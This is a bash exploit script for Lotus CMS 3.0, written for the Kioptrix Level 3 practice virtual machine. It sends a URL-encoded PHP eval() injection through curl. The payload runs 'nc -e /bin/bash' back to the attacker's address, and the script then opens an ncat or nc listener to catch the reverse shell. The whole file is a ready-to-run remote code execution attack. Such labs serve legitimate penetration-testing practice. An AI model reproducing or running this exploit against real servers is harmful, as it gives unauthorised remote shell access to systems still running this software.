#!/bin/bash

# Bash script to exploit Lotus CMS 3.0 on the Kioptrix Level 3 virtual machine.

if [ "$#" -lt 3 ]; then
    echo "[*] Lotus CMS 3.0 PHP eval() exploit."
    echo "[*] Usage: $0 <target ip> <attacker ip> <ncat port>"
    echo "[*] Example: $0 172.16.3.17 172.16.3.18 443"
    exit 0
fi

# URL encode reference https://www.degraeve.com/reference/urlencoding.php

# space = %20
# ' = %27
# ) = %29
# ( = %28
# ; = %3B
# $ = %24
# } = %7D
# { = %7B
# / = %2F

# Execute cURL in the background with a five second delay to start Ncat before cURL executes the payload.
# Payload: http://kioptrix3.com/index.php?page=index');${exec('nc -e /bin/bash 172.16.3.18 443')};#
(sleep 5; curl http://$1/index.php --data "page=index%27%29%3B%24%7Bexec%28%27nc%20-e%20%2Fbin%2Fbash%20$2%20$3%27%29%7D%3B%23" &> /dev/null) &

# Use Ncat if it is available, if not use Nc.
if [  -f "/usr/bin/ncat" ]; then
    ncat -nvlp $3 --allow $1
else
    nc -nvlp $3
fi